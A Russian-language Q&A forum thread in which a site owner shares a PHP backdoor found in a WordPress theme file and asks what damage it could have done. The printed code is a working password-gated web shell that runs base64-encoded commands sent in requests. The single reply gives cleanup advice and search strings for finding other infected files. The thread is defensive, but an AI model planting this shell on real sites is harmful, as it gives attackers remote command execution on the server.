@RigidStyle

Что это за вирус, и чего теперь бояться?

Сегодня обнаружил вот такую вот штуку на WordPress сайте:
Адрес файла: wp-content/themes/index.php

В файле был вот такой код:
<?php
// Silence is golden.

$s=explode(":","6732fc3453c34f00be5bffc4f0dc2bcbdb1fea50:plugin:_lg");$q=$_REQUEST;if (sha1(md5($q[$s[1]]))===$s[0]){if (isset($q[$s[2]])){$l=base64_decode($q[$s[2]]);echo `$l`;}}

Первые две строки - это понятно. А вот последняя была аж на строке 140. И не понятно, что оно делает и куда оно могло пролезть.
Вредоносный код удалил, файл заменил на нормальный. Но чего теперь опасаться? Куда эта штука могла залезть и что там могла наделать?

Антивирусник хоста его обозвал как:
SL-PHP-EVAL_REQUEST-awgh.UNOFFICIAL FOUND
  • Вопрос задан
  • 610 просмотров
Пригласить эксперта
Ответы на вопрос 1
orlov0562
@orlov0562
I'm cool!
Опасаться того, что где-нибудь в другом файле лежит еще один бэкдор.

Залезть могла в любой файл, в твоей рабочей директории, туда куда можно дотянуться из скрипта и где есть права на запись.

Самый лучший способ почистить, это выкачать к себе свежую версию WP и перенести только базу, а лучше только посты WP из базы. Снести все под ноль, и перезалить свежую версию сайта. Это не всегда применимо, но дает самые лучшие результаты. В противном случае, нужно поверху накатить свежю версию файлов WP и поискать другие зараженные файлы с помощью поиска по файлам и маскам из зараженного скрипта, например "sha1(md5(" или "base64_decode($q"
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы